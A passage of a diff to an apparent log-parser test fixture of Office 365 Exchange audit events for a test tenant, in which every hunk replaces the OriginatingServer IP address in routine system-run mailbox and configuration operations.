bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -4906,7 +4906,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota", 
@@ -4980,7 +4980,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -4992,7 +4992,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota", 
@@ -5066,7 +5066,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -5078,7 +5078,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota", 
@@ -5152,7 +5152,7 @@
 },
 {
 "event": { 
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" 
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "", 
@@ -5164,7 +5164,7 @@
 "Operation": "Enable-AddressListPaging",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DoNotUpdateRecipients", 
@@ -5190,7 +5190,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5202,7 +5202,7 @@
 "Operation": "Set-AdminAuditLogConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController", 
@@ -5232,7 +5232,7 @@
 },
 {
 "event": { 
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" 
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "", 
@@ -5244,7 +5244,7 @@
 "Operation": "Set-ExchangeAssistanceConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "Identity", 
@@ -5270,7 +5270,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5282,7 +5282,7 @@
 "Operation": "Set-RecipientEnforcementProvisioningPolicy",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController", 
@@ -5312,7 +5312,7 @@
 },
 {
 "event": { 
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" 
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "", 
@@ -5324,7 +5324,7 @@
 "Operation": "Set-TenantObjectVersion",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController", 
@@ -5346,7 +5346,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -5358,7 +5358,7 @@
 "Operation": "Add-MailboxPermission",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -5388,7 +5388,7 @@
 },
 {
 "event": {
